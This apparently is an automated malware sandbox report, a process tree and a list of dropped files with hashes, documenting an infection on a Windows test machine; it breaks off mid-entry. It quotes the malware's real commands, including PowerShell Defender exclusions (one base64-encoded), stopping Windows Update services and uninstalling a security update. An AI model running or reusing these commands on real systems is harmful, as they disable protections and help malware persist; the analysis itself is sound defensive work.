C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.8.382224794\1348029076" -childID 7 -isForBrowser -prefsHandle 5564 -prefMapHandle 5568 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1060 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e7b0688-16de-49e6-8994-dce56d193efe} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 5480 2bd93724658 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.9.1665361563\424361350" -childID 8 -isForBrowser -prefsHandle 5716 -prefMapHandle 5720 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1060 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {270c9e13-3218-4d7e-b629-74be13e51c78} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 5708 2bd93852c58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.10.1418512179\700359717" -parentBuildID 20221007134813 -prefsHandle 4664 -prefMapHandle 4572 -prefsLen 26328 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3830c5ae-35a3-4034-8797-b71ea107099e} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 4436 2bd914bcb58 rdd3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.11.329958620\1008776908" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 4436 -prefMapHandle 4248 -prefsLen 26328 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {487e63fa-6161-4c57-b54a-802ad8217f9e} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 4428 2bd92169858 utility3⤵
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exeC:\ProgramData\wikombernizc\reakuqnanrkn.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAARgBhAGwAbABiAGEAYwBrAEIAdQBmAGYAZQByAC4AZQB4AGUAOwA=1⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Current\vfxnegawj\FallbackBuffer.exeC:\Users\Admin\AppData\Local\Current\vfxnegawj\FallbackBuffer.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeFilesize
5.0MB
MD5a3fb2b623f4490ae1979fea68cfe36d6
SHA134bec167e0f95ecc36761f77c93c1229c2c5d1f4
SHA2563bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
SHA512370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
216B
MD57c4833e172c8e4ad57914cde593aff84
SHA1b707cdf55ece06df5f3ceeb84cf8a695cf16f78a
SHA2561c4bc801255a82cb025315b3589f607f1baec93f64e04e1d6383608d765f5a5b
SHA512a8417861715a268a236e10fd119ce8790925f9c5413311c0676c3054a494f1900fb50ef3ab9df32ae7e198423f9d137a7008854fef84a83c11c6a911c3eb3ee4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD5244bdfb8d0b7345965f054838937e1e6
SHA15e0fd85fc5a82bfc5292cc26be331a0cb3b87227
SHA256eed8b2724b05cdb82105087648e8e4bfe8979f1bc082263c5b3e8f2ad95889c7
SHA512e2ef573e92d55d3e35af6e9291a4ef4158a3007740c078ebc5e564c43c335cd0d082950cf0e849ce9db57255022a653bf98ae9b93c15655802f21dc9b2016408
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD5a5bbc14e7b41be9e77a686f4ce31e296
SHA1205dcb74adad684793be19b9a1c805146ebc922a
SHA256bcdc9816e5f7c15f3a09fc711be38d5b1d0f5c0942f59706561c00a6531675a6
SHA512c2f429d0cd488b3d8cadb969c3c29ce5b8992df0dd2a0264d265ac5d0e643066b096b1e51f90a6b9c234d99f3855e2cd91606fc803f15c34d83c0955022dd057
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
369B
MD55c2679f42beb6ca50a6145c0f0d53b7c
SHA1679e35651aba67a854bf46a1fed12687a9c96ba6
SHA25645f80607ffa744f29032809dac10be71dd9c6e75a4f7f51c3d63bcd0581e1c85
SHA5126445e5fa733dae3a47e74d2345b42307e5b9878fd0311444ccb221d2fa07a29c0881d33050d99b68055845b7e8cba50d593410596b972c55674701f0c5953f3f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD52be1124edfd5d08338e7997a13f16631
SHA101ab939c55108717540f9e168ae928ad4ab8d227
SHA2562955de7eb5b9339abb82fce3f70e56e009621e7ccfb6ac6aebf1329493548d57
SHA5127b0358ed67b36f78b3b7cb5af5ec209a0860bc7482563cbaab74fffac3367518ae6c5d851b723aec0b7796105a36e9c6bd0139178eac70b6a195377d618ae692
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5c56c9308def809016209a18e58da0e16
SHA125cf3b631dad2808a4ddf776b36bb50b0a636538
SHA256ddfc4947fde91772aa391e0e6d017c2d8c582b3fa1e51235abd1912d56d63917
SHA512a3ba13ebc711527ae46734e58c32b285347262ff1dd06276f28a402c89f1c50e62a33e2e5e3058a91be42d054b1e6ad45baa5c1dfea9f117625797f8c251e1d5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD599d6c70900033ff1a360697b11dfe411
SHA150e326dbb0360a4a89bff0ad673c2e508ff0743f
SHA2567741c79353de498fba14b0f13fcfd0bf3f9b264bd454217db53b89635547919d
SHA512c58ebfb058ff1362986a2aba44a064f2a2f24e45e90af754a9f7d009a75c02b589610ac7e695c5fdeba590a24cc7774dfdf3e679c81a5a822f4f827f7824bb60
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5aabdb86563fc7f197f615212ea599265
SHA1056e2f3bf2fc9ea498946ca9ea675ae638bb8edc
SHA256091546c9d46e776279237e0b0087e4a6d021f4036f78cf276c16ee063fb76358
SHA512b75793bd7f78b4236b19e0157c4c197f057f0ec71c62b759c83ada6e2476e322fdf99423b5df7ec43a9d9008ace9871b8458d463780cd2c4b3925e88194a095d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
12KB
MD565fb2eea0659ee84ea299dff1d12a046
SHA156b22bf1028273a2e45b542adaf0964147d1d62b
SHA2561f0a73288fa193a1c10f4ea445f63312931f01387646ddf1e70bdbe02c34fd7b
SHA512e47a8d746e3b52a4bac9361ad7c7023247d279ab5c84f1e8987f123869d65fc6ead63a24715e74219a575af90e5bfed289fa91c1c0a52c801f495e3dfc7cf702
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
289KB
MD5cb1cbf4fc7d6c7cb719d9b7e70959a42
SHA1ee71418a353932501e79442345e94b38c37d7f27
SHA256ee347fa7080edf057ca6ad394d097a890824936d14e57f0498e16348e435f378
SHA512d8c95e15cfd110b848f15c24b33de461c09f94f55fe699e2654535a2a2e40decb10aa8f7bbacab783d7a9c2fa7e40cf748cf088e308b96ddd62b43503ebbc991
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
289KB
MD5d2c5e9a9523feb89e0bb0bc63f2d3945
SHA15ad34e29c5772a7d21ce1450f6dfdecd021410dc
SHA256b2339e0380c2c5c01474061a0845aba824854e6f19c7c6d841ecf0348b79afc7
SHA5122c1b91f064159d7d11350a5594a781f7588e7e36382d9b334b1b1803668d377badb66b054f61af42f11dcf4bc34fff0ab76d550cd1b649978eeabe79ea2c57e6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1Filesize
264KB
MD55c74b4ebc5c9f906fb3eccfa85b03ee8
SHA155ca248f1514e7b69d882374fd08f52da7250530
SHA25637e44149d192b0dd783d7b19667904c3a9dc8c4ed1890664aeef4f4e0113626f
SHA512c3279d23c0a9e2a42db509a49a5c51864a65757d35ecf0799be6de18efb85ac1b1ba30c44e9282006987b304f3aac0d69ad18a0d5a3ed719b7ada9af2486c0f3
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.jsonFilesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ghjkl.exe.logFilesize
805B
MD5381393509a7caf144cbffd96f55e0ae8
SHA115e2d6530fea05ca9d986535c570fcf7f8d91481
SHA2565e8d9d066e20c07aa52b8d07d60fde4b633bb393ab1bc63a77f78d81f9512b42
SHA512ed35defb962342f2958eb32b5b2958e2e7e70cc9420188a0364e453077e4eeb7f042eb91610d0d38e0c6137da1ac8cb2c746eab28ed1f012cc7231d8c72f5290
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\BritneyFilesize
15KB
MD5f5339a664c62f59758f97c27e5f18250
SHA16fe5f98d6bf4f9271d89d90760cb8abcd5cb0b42
SHA256c7a2bb2a2938356cd5ca3fb1854dbd6972e5cf0482e2958cd82bb076d0f6ac69
SHA512b3bd2f5235059a2c8b9058f888c6f4fffaa2bb603c15dfcde442dd9812a54642868bb3c05b18921da743713351b6ede41f6788e46af543d8e7eb5bdd5f8b8c3b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\DefeatFilesize
8KB
MD55fa2ab455cc5da6e96ab13dd1cd54bb6
SHA181d893c35c38ae7516582fcc51bce0b1e53f941d
SHA25648c0322e96b304cd939baf6d79183e69069678b89184d7a8c43804769095fad2
SHA51206e3ce00536694b0ee72809480f820e90decbc3b3337ef148fa18caeb502f799485c4c1cd1342cc8debff83e0d76f0e8d13b93a75419631da78aa8c59a4d9f6d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\DescriptionsFilesize
10KB
MD5ac7ade76b8beaf6a938d53b3caaba512
SHA123cd8c38ed38d7619cde18b13b9a5aa39daec08e
SHA2567ae2ec9669a960155327bd0a4bc77910a1b99583b52992d7cd8199e4f6ca2f69
SHA512ff4af167f39599d7fcb3bfc94cd3dce9f0ae025298e43d2fd4a6847881d6317463df3f5610d1ae1dc9fdd6de44f9ce156f5b3543c6df4fe2e6b39a524330e705
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\EdFilesize
8KB
MD5f47d19edcc3babcde919e3c34e823295
SHA16c7258605316c1fb24f8ab4356c4a7124c21b69e
SHA256f455c49ee56b4c49cf34ad0cd07986b5f55b504a8b523ea0eb79f332a255a3d6
SHA5129df301ff7113259e13beebf5a7d1b2270c65c568612539bf26416eab2edb3af591a30279793700a881972de4266e1c9e044db3c0de5b6a1d328b700c3004698c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\GoingFilesize
44KB
MD5011c56ba5d5ca60775be001bcfda7f24
SHA1b28ce248f4b2ada7c85224660a17e9bd64ef53b6
SHA256f6ad9a10f800b1238e3c608f7d703420c856c87375bf0bee5b4c58ceefbc23b9
SHA512f263c079c8086c0e9e11062951f5227d79959153880710d0d972944497b0216ee4140d6c66c81173b47f778ef0eb05d6ffbfd6e9e2c8e89b1fb7938ffb38a374
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\InkFilesize
62KB
MD52748c48bf017ec2dbf73d2c49e9c9a71
SHA116f9e9bd7f47653605562daccd7524e5920a58a3
SHA256ed5050fbe794268c6edbe49f8fb226acf859a2c68251c4cb7fc8db4b90ec791d
SHA512c66c9350217284e5a0f8a574cfc910efd798f66315195d716b4ba086595c6c62f2f7b4d505f23af3c9ad615fe6edcaf687404bf81627a39ca356f8392f8a0cdd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\ProcFilesize
13KB
MD53401516a7640eb223c1b2f7e618c451d
SHA1f865b234e6c653130afb438bc7c5260cde3abf92
SHA2569c279dfab8f0a455caa5e1272a37d523d54af33a1b8b8c661121c175e8815692
SHA51294ecb28fde13608a2a0436c7335347d8c8627fcbdbc8c3cf480d7175c086b544ba068ed566fb9174ed78a318ae6ff4337a863c5a220158e5320d1e237ea1786b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\SpiritFilesize
19KB
MD5e3da5f2550d27668b287d2d8781d72fe
SHA1c492e85131f137f564eebfb92ff0d5208350ba39
SHA256338c5edf0aeef9a14ffcaccfa0463ba901bc4b93e6764175df4f1c148cf87168
SHA512ca550c7c69920203aa53096882fb408a4bd1af8438dcedb02f43bd32d125328e09f31677bd77bbdafee9fadb553fa0fd11e6d2c951482033a2e3b08d2b9b39ff
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\SponsorsFilesize
66KB
MD533e77dd003343a54fb3f3c69cb2bd71c
SHA1caba565823d9841ebdadc743741b03b9f098eec5
SHA256e21533aaf685290de228ac13e8eeb0ed0195192e1c18108ad2dcf9f090b14404
SHA5128ffcaf2432aae89f0e2f1eabe4f42b0cfe7f990914ddc988718d1a41ccdc9f5ab62f2138d32fe8054a70b63596525bbc3a109529d1963de64a9a7f67efb54d7a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\StayedFilesize
35KB
MD5326771f3c4cabaab267bba316782af10
SHA13402750abcc2f61054bf751bc7f5228ed3cb49f6
SHA256ce774c5b786f3bcad31d8e9ac06a43747f59d5d9ddcd96db488beb16af3a10dd
SHA512df7d2c48f39833db0da5e4c5bcf2ad3be4ec0e9f60a2b8c6a888a7f74eb8a6b3ad604fffedee2bc2288eabb59d073272fb5edd7733348db70e37163c138e086f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\SwitchedFilesize
12KB
MD5052bd98c12eb6881b0ef0e5809d1dac8
SHA15a678738efb5b39b6d6c2503a3da00ecfd3539ae
SHA25612387059317cee313e858a6707c3abc0aad950d383621ec109acffa1a1e3c456
SHA51286394e8351977784a8dc512aca1a0fd874903fd98c7b7418fac13a13ef4d9654141496211d9808bbd033a9340ed00da0c2b612318eff8425f63f561f0fb91321
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\TankFilesize
155B
MD598d329abe01cf448863e8bc0bd01fddc
SHA172e41bbce5c1a58c7093fdceb16a4d4ceceedc14
SHA256e37dd741efc2fe87d76ff42c501ab30ce887d19de47834e30d8e96bbb33637f5
SHA512b4b9b3c37ba8dcbf331686e3b8fc8533a2c33e449729cb6b00d21575b9975f59bf3c1357bd3d405ebc40e9a180c21e52a5ed172db01365e639ba6d095905c2ba
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\TeachingFilesize
10KB
MD5c5e2683b5a8426fdc75ad224c4c3b432
SHA124e8fa9fff6afbef893ca612786526de4d3f7866
SHA25642d15faa6a365a2d83698253fedbe72a13cbd5b7cf34234073e743a12d7ee276
SHA5120e5a8bbfad9af2d7646ce1cef789baf1967ffdb70b0303d5507732ea1e1fd98658681d6cbf520bcd129109c032bb12996f5d11d71eb688020d36cb949ddc5642
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\WarcraftFilesize
19KB
MD5bf4a4bfb3e732742fed6fad23a0c80bc
SHA1fd1063b5166e6ca2e3ca878c05e017508ec951e0
SHA2561a0a41581f11dadb5a0bc39c9be1fc544f3c178f46d503bc5d28a148764a8c6f
SHA512edb30a9016d0471a02d4a460011f38391b969f268deaeb51e01f392edb0d9c2a3ba0938cfcf5207160c328476df5957a74d04a777a84115d4dc4e2f5bf8cc184
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\WilliamsFilesize
43KB
MD5d4e43ffff41889264559e1ea234696b3
SHA1d0c2f318fc64715d5c7c7ed6612b0383bba202de
SHA256b32991a917dbea6f4c1309dd51c596c6aff925a563df1627f7cf5feb7f234a64
SHA5129a2d5aa2ca6fde40f0635d8b0a2d9e3a14ce3565dcec34192d6c690eda8139795185cf32581990b28ca9853415be1de9a8488f11b902e3ff7910e266ab89405f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\WindsorFilesize
47KB
MD5c734f7c2828866b315e700633b23585a
SHA1e130edbe1002a0ac5dc36b9dc378b3377c25f539
SHA256a64a886e83d6e03b962790b6a1da7c5fa436b7c58ac7e10ae644c367f3363da5
SHA51280481e4810e3107f2a3ff2a54b31cc6c1997a62cc1b6c92dc03c306a7b3a378f232fd57801762f76e5cfbf87e6ca35115b258aa700bbb2439a17877803ff7c24
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5bc53ff7f4f305213b7c571e80a92c66d
SHA1d496e31dc6bca195db2c2b50e9a85045611b5231
SHA2564ee358bf69c880481ffc10d8f046f4a0f16ff5fdd22db840c025f00f26d8a981
SHA5128edf99c10a66809b11c0da4482aa52a34952d1cca6cb01d9d4a1b5846347d02c20870d456d5a852efdd5d6d2cebf16801f931567c3b11b7024f033f08dbf1c2d
-
C:\Users\Admin\AppData\Local\Temp\1000016001\55f76d2d42.exeFilesize
2.3MB
MD55825511fff6477d37c0252823e3a6086
SHA12d1ee4a1219fbf845923d4c0d08498fd15e901de
SHA25684371435f061c089b0f6ea8d1b6393e573e87566f8eb5986abba4430d232dd8c
SHA5124b3c3f7c6dd41eb4eb522e8ec4eec8f597b02bbfafcccc03eeb8fab37d95c2f9337d1eacc393b4b5ff4b91560344f518390af2a99ddb2086222ecc8e63d3db2d
-
C:\Users\Admin\AppData\Local\Temp\1000017001\143a41833f.exeFilesize
2.3MB
MD57bda3a8d02db0fbf3b30f4c4f1f3dce0
SHA1395bb95c0968d7de5c515bf79b0c3d633b948de8
SHA256ec5e49d47bf3f317c3ca1547a349aec2adcbc9cefc04680eebbb7fa3749df9ac
SHA5123566598881ae75598561473a1f60541c0f5c4559ec7d3378d5f2ef90468c4299ccc5d95d3b7c4645609c7b42ff543e9533d78bebb01aec82613760998799b2f3
-
C:\Users\Admin\AppData\Local\Temp\1000020001\num.exeFilesize
2.4MB
MD526a77a61fb964d82c815da952ebedb23
SHA18d9100fcc2e55df7c20954d459c1a6c5861228a1
SHA2562e1662bc8b93a8cea652f916afa628ce5646e3b62d15cf584188f7df066dca73
SHA512793a6dcd9d3eae88b25a24895f0cf2b23060e8b59788b0bbf357a8fd7df0f536301912dcdd8c2ccf08313f89322a350c5bbc0bdce08a44bedd862cf8d421ab9a
-
C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exeFilesize
2.7MB
MD5abf2da5b3e7845f50463a72f8b6e6aaa
SHA1a5299f55950ca82134da73b9e9844c5d624114c3
SHA2562a4b1ae0ae67cd31f85680e6351bd5b92ff61e246c158decb1a43a3ef01d9f2c
SHA512570e8becd18b36d66a2ac295518c8ba3c0bc83d8a6175e601b509efd9237462d1d0826dbeb9e52465e7cdcd57cb4ae7fd859ddc4a5aad895cef6ef7fa981e8a4
-
C:\Users\Admin\AppData\Local\Temp\Files\228.exeFilesize
889KB
MD5fb88fe2ec46424fce9747de57525a486
SHA119783a58cf0fccb5cc519ebf364c4f4c670d81ce
SHA256cbd9e9333684de488c6fd947583149065d9d95b031d6be7a0440c2581a304971
SHA512885d0ec96eb73c3213c9fe055620c70561ca1aecc5f9cb42cc8e1c26b86c383e92f506e8da4696c7ff7c4feafe09791ab900b2a983528b680224af347ef4b40c
-
C:\Users\Admin\AppData\Local\Temp\Files\Chr0me.exeFilesize
835KB
MD5b33928657ad007fff7ace578faef7003
SHA1f60b509b0f9b47cb2a7c18058898e44177688b47
SHA2568562112055dc2db00971733747931789d5ecad535ecd9db1511f80471969fc08
SHA512bccfdf3bcfd71a6799d53b6276d7d08bfc1be262a366b14b781c64b5a235b196ba2f0229402c972c6e67caefcde240dc821d9276cb5e803465f91d282385acc1
-
C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exeFilesize
2.5MB
MD5ffada57f998ed6a72b6ba2f072d2690a
SHA16857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f
SHA256677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12
SHA5121de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f
-
C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exeFilesize
644KB
MD5826879314a9d122eef6cecd118c99baa
SHA11246f26eea2e0499edf489a5f7e06c6e4de989f6
SHA2560e8b9e2c001983dbf72bf112931234c252ffbf41f8fe7b613f68f1dc922e3ec9
SHA51220930a3e0e73bd05d0c117d5dd3fbf6ebdf27abe0a2216a4188baefc7d30d654e7fb63e00cc963e4c71505ab4e51d12e33eeff7b03aae55147429c34cd1e1f0e
-
C:\Users\Admin\AppData\Local\Temp\Files\amadka.exeFilesize
1.8MB
MD5dc0276ccb6dcfe60635df058691aa89d
SHA128c68e9a52bbe823c1a334897cdc73503a066940
SHA256a310bc8faa049a367521d06bb4a61eede52d1c6e8e823afc0ffb9f6a748163f7
SHA51297e745383808bd1528b8070588f4d3b74308d1eaa8fa07c564b3b84bccdd1eeccd7b0847e855226b4f3d0657864ed3902be5cabc628854af3281f52a4be9c07c
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exeFilesize
5.4MB
MD5a2a9c309c5300a53d2c2fc41b71b174b
SHA1f6c26eae1925425fa8966266e87a57b688fad218
SHA2567ccfae8644c3bc7439b88f2dc0de06bb5082de09b0bf5e143de17487ff252224
SHA512a29eec8fa98174a74e9bd93c5902cdd95ce329ff8b7a1469901a95705dc1d7fffde58afa296399febb8559d8cd73c932945e85cce8af54e7a672d8f1618e3f7c
-
C:\Users\Admin\AppData\Local\Temp\Files\msa.exeFilesize
552KB
MD5230ef121bcb5b8c9b91a2c35788d60ca
SHA1476b00d10869e5931bbb799d16f563ac803b50e3
SHA256f3831d6ca373f539fec77e975ae4fc26451bfb3113513813819ea1111f31a81a
SHA512440e54e9a053a494bdfe1b055ee9ef10a39688ed38e4a620d199059efcd23c669f2f86d1f2e0197b9f7be259dc9ca05b1ab599d8f910e082b8dd0dfcf4ee5775
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oimntbek.buh.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Local\Temp\google_default_webdataFilesize
92KB
MD53daad470df391b2f80f1355a73f49b47
SHA1fd3d71f1d5bcca2c56518cdb061fc1e0a2465dec
SHA256a0732dc29331aee2809c08b9dd1bbddcfd6badc2b90a932b1e5c220d573e7b08
SHA512a03c5c17710c1ecafebca8b3066db41e1d682a619162da61d12f7f84c8ead35b49b6f390a473e23c41baff6072ffc6000a52345d5a1f73371b8711f470216b6a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\cookies.sqliteFilesize
512KB
MD59bd4cbe94483b59791767af9ffc8c2b3
SHA164f8700742530281538d8ec9af9c3eeb9c22952b
SHA256598030696cd08e862235c9f6db8d26414d0f118aa5a5feab4bccf7c730593391
SHA5128c7a60b52a183498684c48958b9447894d537e4bcebd7aa41514e89312833341f217e779931102af42a149e236ce7fee71ef03662205d4b5063cb3bca8c2f8c4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\db\data.safe.binFilesize
2KB
MD57982cc4ceebada2ad785ed342ce2fcff
SHA134856d60e168bff9ab96f5acd6a6ab9313ebc550
SHA256858fa716dab7a41165970c4a709b2b54711df8d8ec30d53f196a4d8d0c2f7d26
SHA51261f33d4ee98f84019e24865aad69e4ceb6de3ea25bd80f68051cb8f369e4992d198b7768d59d7fe8b61681d10ac10e4ef02a847a90793370f4f1eb0c32612a05
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\pending_pings\6e7011d8-3ee0-45d4-9a86-67e0073c1049Filesize
746B
MD52ed8329a1cc858d347290bb96a8afac0
SHA139c16a4f7e8df6d965ff8d70f74cbb588a27898c
SHA2565892e61d1d34bc092a1d344a5dab709164993855f049f8fa38d5b8a51b8816b6
SHA51225b35be257a14956e985245ac842e94ee6b15262b636b4d27e341328007795d6f649e9c5727cc1b05cdae225647941e6c536f01ace83615ec3316117d2383a61
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\pending_pings\d02ed492-ffa3-4c4e-976e-ec2ed666cb32Filesize
10KB
MD56ed4e15406a52833e4cf52117758dd83
SHA1930709da30081fb333c49784f74c7d7362cd0b87
